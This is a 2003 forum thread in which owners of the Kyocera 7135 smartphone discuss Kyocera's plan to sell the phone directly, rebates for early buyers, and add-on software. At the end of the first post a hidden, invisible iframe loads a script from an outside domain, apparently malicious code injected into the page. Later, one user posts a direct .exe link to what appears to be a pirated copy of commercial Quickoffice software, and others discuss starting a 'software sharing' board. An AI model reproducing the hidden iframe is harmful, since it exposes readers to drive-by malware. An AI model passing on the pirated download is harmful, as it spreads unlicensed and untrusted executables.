+ Reply to Thread
Page 1 of 3 1 2 3 LastLast
Results 1 to 20 of 51
  1. #1
    Registered User
    Join Date
    02-16-2003
    Posts
    9

    Kyocera selling 7135 direct!

    I just talked with a sales rep at Kyocera Wireless today. Her name is Diana and she was extremely helpful. She let me know that Kyocera will begin selling the 7135 directly as of next week. There will be an incentive discount, but she cannot release the details at this time. For those of you still mulling the purchase, you might want to check this deal out.
    If you are going to purchase a 7135, Diana is more than ready to help you walk throught the Getconnected.com process of getting an a phone (whether or not it is for Alltel service). Starting next week she should be able to sell you one directly next week at a discount.
    Diana has given me permission to post her direct number here. Please be nice to her as she was extremely helpful and we want to encourage good sales people don't we?
    The number is 858-882-3293.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User dwdod's Avatar
    Join Date
    07-01-2001
    Location
    Metro Washington D.C. area
    Posts
    2,085

    Re: Kyocera selling 7135 direct!

    Originally posted by kevindbutler
    I just talked with a sales rep at Kyocera Wireless today. Her name is Diana and she was extremely helpful. She let me know that Kyocera will begin selling the 7135 directly as of next week. There will be an incentive discount, but she cannot release the details at this time. For those of you still mulling the purchase, you might want to check this deal out.
    If you are going to purchase a 7135, Diana is more than ready to help you walk throught the Getconnected.com process of getting an a phone (whether or not it is for Alltel service). Starting next week she should be able to sell you one directly next week at a discount.
    Diana has given me permission to post her direct number here. Please be nice to her as she was extremely helpful and we want to encourage good sales people don't we?
    The number is 858-882-3293.
    I'm confused. Will these be "non-branded" 7135's? Alltell? Verizon? If it is Alltell, then I don't understand how this would be any different than the present situation in which the Alltell-branded phones are sold through Getconnected.
    Dave

  3. #3
    Registered User
    Join Date
    09-13-2002
    Posts
    363

    Re: Re: Kyocera selling 7135 direct!

    Originally posted by dwdod
    I'm confused. Will these be "non-branded" 7135's? Alltell? Verizon? If it is Alltell, then I don't understand how this would be any different than the present situation in which the Alltell-branded phones are sold through Getconnected.
    Discounted!!!! Now I'm pissed. We early adopters should have a rebate if they're doing this. If they discounted $50 off, we should all have a rebate of $50. Anyone else agreed?

  4. #4
    Registered User
    Join Date
    02-16-2003
    Posts
    9
    Sorry if I confused. I believe that these will be unbranded or Alltel branded phones. This is not a carrier making any change, just Kyocera trying to help out its customers. It should just be easier and cheaper to get a phone and activate it on a service like Verizon that will allow you to use a phone that you purchased.

    I see this as Kyocera trying to help out its' customers when none of the cell providers will do anything. My speculation is that this is a bad sign for those people who are looking for Verizon or Sprint to officially release the 7135. Kyocera is trying to make sure people can get the phone and that implies that it won't be released through the carriers any time soon.

    Let me stress that none of this is official Kyocera information. I am just passing on information from a Kyocera rep and then wildly speculating about what it means.

    And no I don't think that Kyocera should provide us a rebate. I bought the 7135 from Getconnected a month ago. I bought the 6035 at full price too. That is the price we pay for getting the new stuff first. I didn't feel that I should get a rebate when the 6035 became extremely discounted. I applaud Kyocera for being the only company in this whole mess who is actually responding to customer demands. I am not upset about this, but excited that more people will get the 7135.

  5. #5
    Registered User
    Join Date
    11-12-2002
    Location
    Jersey Shore
    Posts
    132
    Originally posted by kevindbutler
    ...I am not upset about this, but excited that more people will get the 7135...
    wow kev, you are like ghandi or something.

  6. #6
    Registered User
    Join Date
    01-02-2002
    Posts
    170

    Re: Re: Re: Kyocera selling 7135 direct!

    Originally posted by nl4jy
    Discounted!!!! Now I'm pissed. We early adopters should have a rebate if they're doing this. If they discounted $50 off, we should all have a rebate of $50. Anyone else agreed?

    :biglaughb

    Thanks for the laugh!

    Signed

    A Sprint User.

  7. #7
    Registered User
    Join Date
    02-16-2003
    Posts
    9
    Originally posted by tripm
    wow kev, you are like ghandi or something.
    Not at all, it is pure self-interest. I want the 7135 to be widely bought so it will be well-supported by software vendors. I want it to be widely bought so that Kyocera will see value in supporting it. I want it to be widely bought so that they continue to improve and upgrade their Smartphone line. I want it to be bought so that Kyocera realizes the value of responding to its customers and offers rebates and direct sales on future products. But most of all I want this phone to be bought by a huge number of people and for that the major cell carriers will realize what a mistake they have made in not offering the 7135.
    Amything that gets more users for the 7135 will benefit me personally.

    It seems like a bad idea to antagonize Kyocera by demanding a rebate on a phone that they didn't directly sell to you. We should be happy that Kyocera is trying to respond to the problems.

  8. #8
    Registered User
    Join Date
    11-12-2002
    Location
    Jersey Shore
    Posts
    132

    I'm with you!

    really!

  9. #9
    Administrator
    Join Date
    10-21-2001
    Posts
    26,048
    um, isnt this old news?

  10. #10
    Registered User
    Join Date
    12-26-2001
    Posts
    41

    Exciting...

    that we can buy this phone but have no viable carrier (yeah, I know, Verizon)

  11. #11
    Registered User
    Join Date
    09-13-2002
    Posts
    363
    But if it wasn't for us, wouldn't you think this phone will be dead?!? I mean how many users or corporate users will actually carry this phone through alltel??? We're the one that is supporting the product early on when Kyocera is not receiving payments from the big guys (ahem, verizon).

    It's not about having the most unique phone or having the phone first. It just that I felt cheated because I'm one of the early supporters that didn't really get anything extra out of it. When VZ releases the phone, they'll get quickoffice. When Kyo release the phone directly, they'll be heavly discounted. When who knows release the phone, they'll probably included accessories that we previously have to purchased. It just doesn't seems fair for the little people that supported them from the beginning.

    If not a rebate, at least something else to thank us for the support.

  12. #12
    Registered User Beryl's Avatar
    Join Date
    09-11-2002
    Location
    Colorado
    Posts
    1,912
    Originally posted by kevindbutler
    And no I don't think that Kyocera should provide us a rebate. I bought the 7135 from Getconnected a month ago. I bought the 6035 at full price too. That is the price we pay for getting the new stuff first. I didn't feel that I should get a rebate when the 6035 became extremely discounted. I applaud Kyocera for being the only company in this whole mess who is actually responding to customer demands. I am not upset about this, but excited that more people will get the 7135.
    I agree. I've had mine for 2 months now and I got my money's worth. I just want the CD with the Quickoffice software.

  13. #13
    Registered User
    Join Date
    02-11-2003
    Posts
    33
    Everyone always wants quickoffice. Here you go: http://www.razorscape.com/quickoffice.exe - in exchange maybe someone can email me blazer browser? I went to handango to download the trial, but the link was broken. Thanks.

  14. #14
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184
    Originally posted by rguibara
    Everyone always wants quickoffice. Here you go: http://www.razorscape.com/quickoffice.exe - in exchange maybe someone can email me blazer browser? I went to handango to download the trial, but the link was broken. Thanks.
    The link on handango is not broken. I just downloaded a fresh copy of the trial version.

    If you still can't get it to work, PM me with your email address and I'll forward it to you.

    Alan

  15. #15
    Registered User
    Join Date
    03-08-2002
    Posts
    325
    Originally posted by rguibara
    Everyone always wants quickoffice. Here you go: http://www.razorscape.com/quickoffice.exe
    I downloaded it based on that link, but I got a German version?

  16. #16
    Registered User
    Join Date
    03-20-2002
    Posts
    74
    Originally posted by RMSko
    I downloaded it based on that link, but I got a German version?
    Sprechen Sie Deutsch nicht? I downloaded it, and once you figure out what German buttons to hit in installation, it works in English after that.

    Auf Wiedersehen!
    The 7135 is a marathon, not a Sprint

  17. #17
    Registered User
    Join Date
    02-11-2003
    Posts
    33
    Yeah, the unzipper is german - I have no idea. But it is an english version and it works perfect. Enjoy!

  18. #18
    Registered User
    Join Date
    03-10-2003
    Posts
    176
    Hi guys, first post but have been lurking awhile...

    Question, I downloaded the software, but it asks for a password? Is there one?

    Thanks in advance,
    tracey

  19. #19
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Don't some of these posts belong on our "software sharing" board? (oops... I forgot, we don't have one! :eyesroll ).
    Please visit my picture site: Robert-O-Rama :)

  20. #20
    Registered User
    Join Date
    02-11-2003
    Posts
    33
    I think we should start one....where is this board based? would software companies have a breakdown if we did?

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts